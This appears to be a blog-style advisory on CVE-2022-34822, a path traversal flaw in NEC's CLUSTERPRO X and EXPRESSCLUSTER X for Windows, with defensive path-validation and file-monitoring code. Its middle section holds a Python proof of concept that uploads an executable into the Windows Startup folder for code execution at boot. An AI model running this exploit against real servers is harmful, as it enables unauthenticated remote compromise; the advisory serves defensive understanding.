In 2022, a serious vulnerability, CVE-2022-34822, was discovered in the leading cluster management and high-availability software from NEC—CLUSTERPRO X 5. for Windows and earlier and EXPRESSCLUSTER X 5. for Windows and earlier (including their SingleServerSafe variants). This flaw enables a remote, unauthenticated attacker to overwrite existing files on the file system and potentially execute arbitrary code with the privileges of the affected service.
If your organization relies on these solutions for business continuity, this is a must-read to protect your data and systems.
## What is the Vulnerability?
At its core, CVE-2022-34822 is a path traversal vulnerability. The affected software allows clients to upload files but doesn't properly validate user-supplied path data. This means it's possible to sneak files into sensitive or completely unexpected locations using directory traversal tricks (e.g., `../../`). An attacker can therefore:

- Overwrite existing files anywhere the affected service can write.
- Potentially gain remote code execution on the server.

No authentication is needed, making this an extremely dangerous bug.
## How Does the Exploit Work?
Let's break it down in simple terms. The software exposes an API or web interface for file operations. Instead of only writing to allowed safe directories, it trusts user input for the location and name of the file.
1. The attacker crafts a request to upload a file.
2. In the file path parameter, the attacker uses `..\` or `../` to traverse directories (known as *directory traversal* or *path traversal*).
3. The vulnerable server concatenates this path with its own internal directory without sanitizing it.
4. The file lands right where the attacker wants, possibly overwriting crucial config files or even dropping web shells or executables.
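To make step 3 concrete from the defender's side, here is an added example (not code from the original post or from NEC): a Python function that mirrors the unsafe concatenation, next to a hardened resolver that allowlists the filename and then proves the resolved path is still inside the upload directory. The upload root `C:\app\uploads` and the function names are assumptions made for illustration; `ntpath` applies Windows path rules on any platform, so the example runs offline.

```python
import ntpath
import re
from typing import Optional

# Assumed upload directory for illustration only; not the product's real install path.
UPLOAD_ROOT = r"C:\app\uploads"

# Allowlist for a bare filename. Separators (both kinds), drive letters, alternate data
# stream colons and parent references ("..") can never match this pattern.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def vulnerable_upload_path(root: str, client_name: str) -> str:
    """The flawed pattern described above: the user-supplied name is glued onto the
    upload directory with no validation. normpath shows where Windows would really write."""
    return ntpath.normpath(root + "\\" + client_name)


def resolve_upload_target(root: str, client_name: str) -> Optional[str]:
    """Hardened version: returns the path to write to, or None if the name is rejected."""
    # 1. Treat the client-supplied value strictly as a filename, never as a path.
    if not SAFE_NAME.fullmatch(client_name):
        return None
    # 2. Defense in depth: resolve the candidate and require that it still lies under
    #    root, so a future mistake in the allowlist cannot become a traversal.
    root_norm = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root_norm, client_name))
    if ntpath.commonpath([root_norm, candidate]) != root_norm:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample names: one traversal attempt and one legitimate upload.
    for name in (r"..\..\..\Users\Public\Start Menu\Programs\Startup\evil.exe",
                 "report-2022.log"):
        print(f"{name!r}")
        print("  vulnerable server writes to:", vulnerable_upload_path(UPLOAD_ROOT, name))
        print("  hardened server writes to:  ", resolve_upload_target(UPLOAD_ROOT, name))
```

Both checks are needed: the allowlist rejects the attacker-controlled name before any path arithmetic happens, and the containment check catches anything the allowlist might one day let through (for example if it were loosened to accept subdirectory names).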
Assume the vulnerable API is at `http://target.server:808/upload`. The request might look something like this (in Python, using `requests`):

```python
import requests

url = 'http://target.server:808/upload'

# Payload: traverse out of the upload directory into Windows' "Startup" folder (to run on boot!)
malicious_path = r"..\..\..\..\..\..\Users\Public\Start Menu\Programs\Startup\evil.exe"

with open('evil.exe', 'rb') as payload:
    files = {
        'file': (malicious_path, payload, 'application/octet-stream')
    }
    response = requests.post(url, files=files)

if response.status_code == 200:
    print("File uploaded! Check if your payload executed.")
else:
    print("Upload failed. Check your exploit path.")
```
### What happens here?

The server copies `evil.exe` to the Windows Startup folder. Next time the server boots, it runs your code.

On Linux, you'd do the same with `/../../../../../etc/passwd` or similar, but this CVE covers Windows installs.
## Responsible Disclosure & Public Advisories
- NEC Product Vulnerability - CVE-2022-34822
- Original JVN advisory (Japanese)
## Recommendation

- Monitor for suspicious file changes in sensitive directories.
- If unable to patch immediately, consider disabling file upload features or firewalling off the management service.
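The first recommendation, watching sensitive directories for unexpected file changes, can be implemented as a baseline-and-compare routine. The following is an added example, not part of the original advisory or of NEC's software: it hashes every file under a directory, then reports files that appeared, disappeared or changed. `demo()` builds a constructed scenario in a temporary directory that stands in for a Startup folder; the directory and file names in it are made up.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(directory: str) -> dict[str, str]:
    """Map every file under `directory` (relative POSIX-style path) to its SHA-256 digest."""
    base = Path(directory)
    digests = {}
    for path in sorted(base.rglob("*")):
        if not path.is_file():
            continue
        h = hashlib.sha256()
        with path.open("rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                h.update(chunk)
        digests[path.relative_to(base).as_posix()] = h.hexdigest()
    return digests


def diff_snapshots(before: dict[str, str], after: dict[str, str]) -> dict[str, list[str]]:
    """Compare two snapshots and list what was added, removed or modified."""
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    modified = sorted(p for p in set(before) & set(after) if before[p] != after[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict[str, list[str]]:
    """Constructed scenario: a watched directory with one known file, then a traversal-style
    upload that drops a new executable and overwrites the existing file."""
    with tempfile.TemporaryDirectory() as tmp:
        startup = Path(tmp) / "Startup"          # stands in for a sensitive directory
        startup.mkdir()
        (startup / "desktop.ini").write_bytes(b"[.ShellClassInfo]\r\n")
        baseline = snapshot(tmp)                 # taken while the system is known-good

        # Simulated effect of the attack described in this post (constructed, not a real payload).
        (startup / "evil.exe").write_bytes(b"MZ constructed sample")
        (startup / "desktop.ini").write_bytes(b"tampered")

        return diff_snapshots(baseline, snapshot(tmp))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:>9}: {paths}")
```

In production the baseline would be stored outside the monitored host and the comparison run on a schedule or from a file-change event, with any `added` or `modified` entry under a Startup, service binary or configuration directory raising an alert.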
## Why Should You Care?
A single, unauthenticated HTTP/HTTPS request could let an attacker overwrite files anywhere on your server. In the worst case, this means a full remote compromise—your critical cluster service becomes the entry point for a system-wide breach.
## Conclusion
CVE-2022-34822 is one of those rare bugs: unauthenticated, easy to exploit, and with potentially catastrophic consequences. If you're running NEC CLUSTERPRO X or EXPRESSCLUSTER X on Windows, patch immediately or implement workarounds, and don't underestimate the risk.
## References
- JVN#95781067: Path Traversal in CLUSTERPRO X/EXPRESSCLUSTER X for Windows
- CVE-2022-34822 entry at NVD
- Official NEC Security Notice *(Japanese)*
## Timeline
Published on: 11/08/2022 22:15:00 UTC
Last modified on: 11/09/2022 16:30:00 UTC